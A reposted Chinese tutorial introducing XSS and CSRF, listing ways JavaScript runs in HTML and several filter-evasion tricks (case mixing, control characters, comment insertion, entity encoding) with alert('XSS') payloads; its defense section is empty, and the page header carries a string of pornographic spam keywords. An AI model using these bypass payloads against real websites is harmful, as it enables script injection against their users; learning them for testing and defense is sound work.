日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Xss Csrf 简介

發(fā)布時(shí)間:2023/12/13 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Xss Csrf 简介 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

一、Js在web的執(zhí)行環(huán)境

1.直接觸發(fā)

?在HTML頁中插入<script></script>腳本標(biāo)記。JS嵌入到HTML中的兩種方式: ?1)直接嵌入<script>標(biāo)簽

?<script language=“javascript”>

?document.write(“hello world!”);

?</script>

?2)在外部以js文件的形式嵌入

<script language=“javascript” src=“test.js”>

</script>

2.利用HTML標(biāo)簽屬性觸發(fā)

?利用HTML標(biāo)簽中能夠訪問文件的屬性來執(zhí)行JS代碼。JS中包含一個(gè)URL偽協(xié)議,可以使用javascript:加上任意JS代碼來表示一個(gè)URL,瀏覽器裝載此URL時(shí),JS被執(zhí)行。

< img src=“javascript:alert(‘XSS’)” />

< img dynsrc=“javascript:alert(‘XSS’)” />

?

3.?利用HTML事件觸發(fā) ?HTML標(biāo)簽中定義了一系列事件。

<img src=“#” οnerrοr=“alert(‘XSS’)” />

<img onClick =“alert(‘XSS’)” />

4?利用CSS觸發(fā) lCSS嵌入HTML中的三種方式:

1)以.css文件的形式:

<link href=“test.css” rel=“stylesheet” type=“text/css”/>

2)以<style></style>標(biāo)簽的方式:

< style type="text/javascript">alert('XSS');</ style >?

3)在標(biāo)簽中以style屬性的方式。

<a style ="background-image: url(javascript:alert('XSS'))">? </a>

5?其他 IE支持在CSS中使用expression,用來把CSS和JS結(jié)合起來,即CSS后跟一段JS代碼,CSS屬性的值等于JS代碼的執(zhí)行結(jié)果:

<style>

h1{color:#CCC;height:expression(alert(‘xss’));}

</style>

二、Xss的介紹

三、XSS挖掘技巧

?過濾規(guī)則:1.關(guān)鍵字過濾:如:javascript等;2.<>等特殊字符轉(zhuǎn)碼。 1.但是HTML并不遵循XHTML標(biāo)準(zhǔn),所以可以將HTML標(biāo)簽屬性值大小寫、混合寫,而且標(biāo)簽屬性可以單引號(hào)、雙引號(hào),也可以不用引號(hào):如:

??? <img src=“javascript:alert(‘XSS’)” />

??? 寫為<img src=“JavasCripT:alert(‘XSS’)” />可繞過過濾規(guī)則

2.插入控制符的ASCII碼混淆,不影響原代碼的執(zhí)行。如tab(&#9)、換行符號(hào)(&#10)、回車符(&#13)等31個(gè)控制字符。

???? 如: <img src=“javascript:alert(‘XSS’)” />,混淆后代碼為:

???????? <img src=“&#15;javascript:alert(‘XSS’)” />

3. 繞過HTML標(biāo)簽內(nèi)的關(guān)鍵字過濾,在插入代碼的屬性前加入混淆屬性,如: <img src=“abc>” οnclick=“alert(‘XSS’)” />

4. 插入注釋符如: <img style=“xss:expr/*xss*/ession(alert(111))”>

5.對CSS:\會(huì)被瀏覽器忽略: : <img style=“background-image:url(ja\vas\\\\cript:alert(111))”>

6.編碼繞過,如: <img src=“&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#4l&#59”>等價(jià)于<img src=“javascript:alert(‘xss’;)”.>

????? http://ha.ckers.org/xss.html

四、防XSS

五、跨站請求偽造(CSRF) 某些瀏覽器允許跨域攜帶cookies。如: 在a.com訪問b.com時(shí),會(huì)攜帶B.com的cookies 例如火狐瀏覽器

轉(zhuǎn)載于:https://www.cnblogs.com/sohold/archive/2013/01/07/2848769.html

總結(jié)

以上是生活随笔為你收集整理的Xss Csrf 简介的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。